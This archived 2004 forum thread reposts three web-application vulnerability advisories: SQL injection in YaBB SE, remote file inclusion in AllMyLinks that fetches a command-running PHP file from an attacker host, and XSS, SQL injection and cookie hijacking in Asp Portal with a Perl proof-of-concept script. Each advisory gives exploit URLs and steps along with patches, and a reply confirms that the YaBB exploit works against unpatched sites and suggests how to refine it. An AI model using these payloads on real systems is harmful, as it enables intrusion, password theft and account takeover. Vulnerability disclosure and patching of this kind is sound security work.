Combined Post 3 Sql Injection Vulns.

Full Version: Combined Post 3 Sql Injection Vulns.

GovernmentSecurity.org > The Archives > Exploit Articles

Nexcess

Feb 17 2004, 05:24 AM

First YaBB Se (another one)

CODE

Details
Vulnerable Systems:
* YaBB SE versions 1.5.4, 1.5.5, possibly others

The file Post.php is vulnerable to SQL injection because the quote parameter
isn't checked against malicious input, so is possible to inject SQL.

How To Exploit the vulnerability:

1- you need to be a registered user to exploit this hole.
2- Click any board you see. ex. General Discussion.
3- Click any message. ex Welcome to YaBB SE!
4- Now view the source code of this page and search this string "sesc"
withou the quotes this is the session id , is an hex number of 32 characters
ex.(13a478d8aa161c2231e6d3b36b6d19f2), you'll need this later
5- now your url is something like this
http://vulnhost/yabbse/index.php?board=1;action=display;threadid=1
6- change your url to look like this.

http://localhost:8080/yabbse//index.php? board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+
reply;quote=-12& #41;+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_mem
bers+where+ID_MEMBER=1/*

the value of sesc is the value you get before from the source code

and voilá you get the hashed password from the user with the id = 1 in the
Subject textBox something like this
Re:e320774659b1b23333bd033754d21bc4

Vendor Status:
january 23, 2004: I contacted the vendor
january 23, 2004: Vendor says they are working on it.
january 29, 2004: I send another email to know how the work was progressing.
No Response.
february 3, 2004 I send another email to know the status of the work.
february 4, 2004 Vendor says the'll figure how to do.
february 16, 2004 I doesn't want to keep waiting, so i publish the
vulnerability.

Temporal Solution:

Open Post.php and go around line 49

you'll see something like this.

$quotemsg = $quote;

change to this.

if ( !is_numeric($quote) )
{
die('Go out C==|=======>');
}

$quotemsg = $quote;

that's it.

Credits go to: BackSpace

AllMyLinks PHP Code Injection vulnerability

CODE

******** AllMyLinks PHP Code Injection vulnerability ********

Product : AllMyLinks
Vendor : www.php-resource.net
Date : February 14, 2004
Problem : PHP Code Injection
Vendor Contacted ? : No

************************** Source ****************************

in /include/footer.inc.php

--------------------------------------------------------------

$AML_footer_get =
require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");

--------------------------------------------------------------

************************** Exploit ***************************

http://[target]/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a

in http://[attacker]/include/template.inc.php have :

------------------------

<?
system($cmd);
?>

------------------------

************************** Impact ****************************

Malicious user execute arbitrary commands on the server .

************************* Solution ***************************

in /include/footer.inc.php replace

$AML_footer_get =
require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");

for

if (isset($_AMLconfig['cfg_serverpath'])){
die("Don\'t Hack it :)");
}

$AML_footer_get =
require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");

Asp Portal Multiple Vulnerabilities

CODE

Hash: SHA1

Title: Asp Portal Multiple Vulnerabilities

By: Manuel López

Software: Asp Portal

Vendor Description:
ASP Portal is a an ASP powered portal site which uses an Access database to store all the site info. The script also includes and easy to use Admin Interface, so you can change everything you need to online, which makes maintaing the site very easy.

Severity:
Moderately critical

Impact:
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, ID Spoofing.

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Description:

---- Cross-Site Scripting ----

This product is vulnerable to the Cross-Site Scripting vulnerability that would allow attackers to inject HTML and script codes into the pages and execute it on the client's browser.

http://localhost/index.asp?inc='>[XSS]
http://localhost/index.asp?inc=profile&searchtext='>[XSS]
http://localhost/index.asp?inc=forumread&article='>[XSS]

---- Image ScriptCode Injection ----

An attacker can inject arbitrary HTML or scriptcode instead of an Image in "photograph URL" of user's 'details' page.
javascript:alert()

---- Sql Injection ----

Another problem of sanitation could lead an attacker to inject SQL code to manipulate and disclose various information from the database. The problem is in the fields 'pageid' and 'downloadscat'.

http://localhost/index.asp?inc=blog&pageid='[SqlQuery]
http://localhost/index.asp?inc=downloadssub&downloadscat='[SqlQuery]

Also it is possible an Sql Injection in the cookie, in 'thenick' field.

GET http://localhost/index.asp HTTP/1.1
Cookie: thenick='[SqlQuery]

---- Cookie Account Hijack ----

It is possible to impersonate others by manipulating the 'thenick' parameter in the cookie.
Modifying the cookie is possible to gain access to other account. This issue can be exploited to gain an administrative account with the service.

---- PROOF OF CONCEPT COOKIE ACCOUNT HIJACK ----

#!/usr/bin/perl -w
## PROOF OF CONCEPT COOKIE ACCOUNT HIJACK
## Example: Asp-POC.pl localhost portal/index.asp Admin respuesta.htm

use IO::Socket;
if (@ARGV < 4)
{
print "\n\n";
print " ____________________________________________________________ \n";
print "| |\n";
print "| PROOF OF CONCEPT COOKIE ACCOUNT HIJACK |\n";
print "| Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";
print "| |\n";
print "| By: Manuel López #IST |\n";
print "|____________________________________________________________|\n";
print "\n\n";
exit(1);
}

$host = $ARGV[0];
$directorio = $ARGV[1];
$usuario = $ARGV[2];
$fichero = $ARGV[3];

print "\n";
print "----- Conectando <----\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conectado\n";
print "====> Enviando Datos\n";
$socket->print(<<taqui) or die "write: $!";
GET http://$host/$directorio HTTP/1.1
Cookie: thenick=$usuario

taqui
print "====> OK\n";
print "====> Generando $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result;

------------------------------------------------

Solution:
Vendor contacted.
The vulnerabilities have reportedly been fixed in the new version.
Download the January patch: http://www.aspportal.net/downloadsviewer.asp?theurl=38 or buy the new version.

I signed up for all the security mailing lists that i found to have much worth-while content. If the staff here doesn't want me passing all there along, ill chill

-Nexy

schnibble

Feb 27 2004, 11:19 PM

I used that yabbse exploit and it works. Still no official patch. Quite usefull. You can execute any sql command. But, perhaps, better advice would be to use quote button and then change the url, couse of localisation or language selection, which changes url a bit.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.